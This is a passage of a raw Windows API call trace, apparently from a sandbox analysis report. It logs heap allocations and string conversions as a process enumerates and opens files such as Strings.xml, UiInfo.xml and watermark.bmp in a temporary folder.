hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0068.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0068.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0068.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0068.763] AreFileApisANSI () returned 1 [0068.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Strings.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Strings.xml", lpUsedDefaultChar=0x0) returned 34 [0068.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0068.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0068.763] AreFileApisANSI () returned 1 [0068.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0068.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x690d0 [0068.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Strings.xml") returned 34 [0068.764] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.764] GetFileType (hFile=0x410) returned 0x1 [0068.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0068.764] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.764] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.764] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.764] CloseHandle (hObject=0x410) returned 1 [0068.765] AreFileApisANSI () returned 1 [0068.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0068.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68f40 [0068.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Strings.xml") returned 34 [0068.765] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.765] GetFileType (hFile=0x410) returned 0x1 [0068.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0068.765] CloseHandle (hObject=0x410) returned 1 [0068.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0068.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0068.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0068.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0068.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0068.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0068.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0068.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0068.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0068.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0068.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0068.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0068.766] AreFileApisANSI () returned 1 [0068.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0068.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68d60 [0068.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Strings.xml") returned 34 [0068.766] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3704)) returned 1 [0068.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0068.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0068.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0068.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.766] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x97f2, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0068.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0068.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0068.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0068.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0068.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0068.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0068.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0068.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0068.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0068.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0068.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0068.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0068.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.767] AreFileApisANSI () returned 1 [0068.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\UiInfo.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\UiInfo.xml", lpUsedDefaultChar=0x0) returned 33 [0068.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0068.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0068.767] AreFileApisANSI () returned 1 [0068.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0068.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x69210 [0068.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\UiInfo.xml") returned 33 [0068.768] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.768] GetFileType (hFile=0x410) returned 0x1 [0068.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0068.768] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.768] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.768] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.768] CloseHandle (hObject=0x410) returned 1 [0068.769] AreFileApisANSI () returned 1 [0068.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0068.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68b80 [0068.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\UiInfo.xml") returned 33 [0068.769] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.769] GetFileType (hFile=0x410) returned 0x1 [0068.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0068.769] CloseHandle (hObject=0x410) returned 1 [0068.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0068.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0068.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0068.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0068.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0068.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0068.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0068.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0068.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0068.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0068.770] AreFileApisANSI () returned 1 [0068.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0068.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68d60 [0068.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\UiInfo.xml") returned 33 [0068.770] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x97f2)) returned 1 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.770] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0x19688, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="watermark.bmp", cAlternateFileName="WATERM~1.BMP")) returned 1 [0068.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0068.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0068.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0068.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0068.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0068.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0068.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0068.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0068.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0068.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0068.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0068.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0068.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0068.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0068.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.771] AreFileApisANSI () returned 1 [0068.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\watermark.bmp", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, 